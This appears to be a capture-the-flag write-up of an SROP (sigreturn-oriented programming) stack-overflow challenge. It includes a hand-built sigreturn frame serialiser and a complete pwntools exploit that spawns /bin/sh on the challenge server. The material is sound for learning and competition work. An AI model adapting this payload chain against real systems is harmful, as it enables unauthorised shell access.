Tags: pwn srop 

Rating:

This was an SROP (sigreturn-oriented programming) challenge. The binary was hand-rolled assembly with an obvious stack overflow but no useful ROP gadgets: in particular, nothing to load a chosen value into rax, only a read syscall stub and a bare `syscall` instruction.

Steps:
1.) Build a sigreturn frame that sets up the registers for execve("/bin/sh", 0, 0): rax = 59 (SYS_execve), rdi = address of the "/bin/sh" string, rsi = rdx = 0, rip = address of the `syscall` instruction, rsp = any writable address.
2.) Overflow the stack with the read gadget, then the `syscall` gadget, then the frame. rt_sigreturn is syscall 15 on x86-64 and there is no gadget to set rax, so return into the read syscall first: read() returns the byte count in rax, so sending exactly 15 bytes leaves rax = 15.
3.) The ret after the read lands on the `syscall` gadget, which now executes rt_sigreturn with rsp pointing at the frame. The kernel restores every register from the frame and resumes at the `syscall` instruction again, this time with rax = 59 and the execve arguments in place, so execve("/bin/sh", 0, 0) runs.
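To make the trick concrete without pwntools installed, here is an added example (not part of the original writeup or its exploit) that hand-packs the amd64 sigreturn frame with `struct`, using the same 31 eight-byte slots pwntools' `SigreturnFrame` emits for the kernel's ucontext/sigcontext layout, and assembles both stages of the payload. The gadget addresses, the padding and the fake rsp are taken from the exploit above; the "/bin/sh" address is a parameter because it depends on the binary's `msg` symbol, and the value passed in the usage line is a placeholder.

```python
import struct

# Slot order of the x86-64 ucontext that rt_sigreturn (syscall 15) restores from
# the address in rsp. This is the same 8-byte-per-field order pwntools uses for
# its amd64 SigreturnFrame, so offsets match what bytes(frame) produces.
SIGFRAME_FIELDS = [
    "uc_flags", "&uc", "ss_sp", "ss_flags", "ss_size",
    "r8", "r9", "r10", "r11", "r12", "r13", "r14", "r15",
    "rdi", "rsi", "rbp", "rbx", "rdx", "rax", "rcx", "rsp", "rip",
    "eflags", "csgsfs", "err", "trapno", "oldmask", "cr2", "&fpstate",
    "__reserved", "sigmask",
]
OFFSETS = {name: i * 8 for i, name in enumerate(SIGFRAME_FIELDS)}

SYS_RT_SIGRETURN = 15
SYS_EXECVE = 59

# Addresses from the writeup's exploit (the binary is not rebuilt here).
READ_GADGET = 0x40101b      # read syscall stub; its ret pops the next stack slot
SYSCALL_GADGET = 0x401047   # bare syscall instruction
FAKE_RSP = 0x402000         # any writable address is fine for the restored rsp
PADDING = 0x20              # bytes from the buffer to the saved return address


def p64(v):
    return struct.pack("<Q", v & 0xFFFFFFFFFFFFFFFF)


def build_sigframe(**regs):
    """Serialise a sigreturn frame. csgsfs defaults to 0x33 (the user-mode cs
    selector) so the restored context stays in ring 3; all other slots are 0
    unless overridden by keyword."""
    values = {name: 0 for name in SIGFRAME_FIELDS}
    values["csgsfs"] = 0x33
    for name, val in regs.items():
        if name not in values:
            raise ValueError("unknown frame field %r" % name)
        values[name] = val
    return b"".join(p64(values[name]) for name in SIGFRAME_FIELDS)


def frame_reg(frame, name):
    """Read one register slot back out of a serialised frame."""
    off = OFFSETS[name]
    return struct.unpack("<Q", frame[off:off + 8])[0]


def build_stage1(binsh_addr):
    """Overflow payload: pad | read gadget | syscall gadget | sigreturn frame.
    After the read's ret pops SYSCALL_GADGET, rsp points at the frame, which is
    exactly where rt_sigreturn expects it."""
    frame = build_sigframe(rax=SYS_EXECVE, rdi=binsh_addr, rsi=0, rdx=0,
                           rsp=FAKE_RSP, rip=SYSCALL_GADGET)
    return b"A" * PADDING + p64(READ_GADGET) + p64(SYSCALL_GADGET) + frame


def build_stage2():
    """Second send: read() returns the byte count in rax, so exactly 15 bytes
    (14 filler plus the newline a sendline-style helper appends) make the
    following syscall instruction execute rt_sigreturn."""
    return b"A" * (SYS_RT_SIGRETURN - 1) + b"\n"


if __name__ == "__main__":
    # Placeholder "/bin/sh" address (assumption): in the real exploit it is
    # elf.symbols['msg'] + len("Hello, world!!\n").
    stage1 = build_stage1(0x402010)
    frame = stage1[PADDING + 16:]
    for reg in ("rax", "rdi", "rsi", "rdx", "rsp", "rip", "csgsfs"):
        print("%-7s @+%3d = %#x" % (reg, OFFSETS[reg], frame_reg(frame, reg)))
    print("stage1: %d bytes, stage2: %d bytes" % (len(stage1), len(build_stage2())))
```

The offsets printed (rdi at +104, rax at +144, rsp at +160, rip at +168) are the ones to check when a frame is built by hand or when a partial overwrite must land a single register; every slot after rip can stay zero except csgsfs, and the kernel only needs rsp to be the frame's address at the moment the `syscall` runs.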

```python
import pwn
import time

elf = pwn.ELF("./srop_me")

pwn.context.binary = elf
pwn.context.log_level = "DEBUG"
pwn.context(terminal=['tmux', 'split-window', '-h'])

# p = elf.process()   # local testing
p = pwn.remote("challs.n00bzunit3d.xyz", 38894)

# Registers the kernel restores when the bare syscall executes rt_sigreturn:
# execve("/bin/sh", NULL, NULL), resuming at the syscall instruction itself.
frame = pwn.SigreturnFrame()
frame.rax = pwn.constants.SYS_execve
frame.rdi = elf.symbols['msg'] + len("Hello, world!!\n")   # "/bin/sh" sits right after the greeting
frame.rsi = 0
frame.rdx = 0
frame.rsp = 0x402000   # any writable address
frame.rip = 0x401047   # syscall instruction

read_gadget = 0x40101b      # read syscall stub (sets rax to the byte count)
syscall_gadget = 0x401047   # bare syscall

# Overflow: return into read, then into syscall (rt_sigreturn) with the frame on top of the stack
p.sendlineafter(b"Hello, world!!", b"A"*0x20 + pwn.p64(read_gadget) + pwn.p64(syscall_gadget) + bytes(frame))
time.sleep(.5)
# 14 bytes + the newline sendline appends = 15 bytes read = SYS_rt_sigreturn in rax
p.sendline(b"A"*(0xf-1))

p.interactive()
```

Original writeup (https://youtu.be/PT4-jBSvYxM?t=887).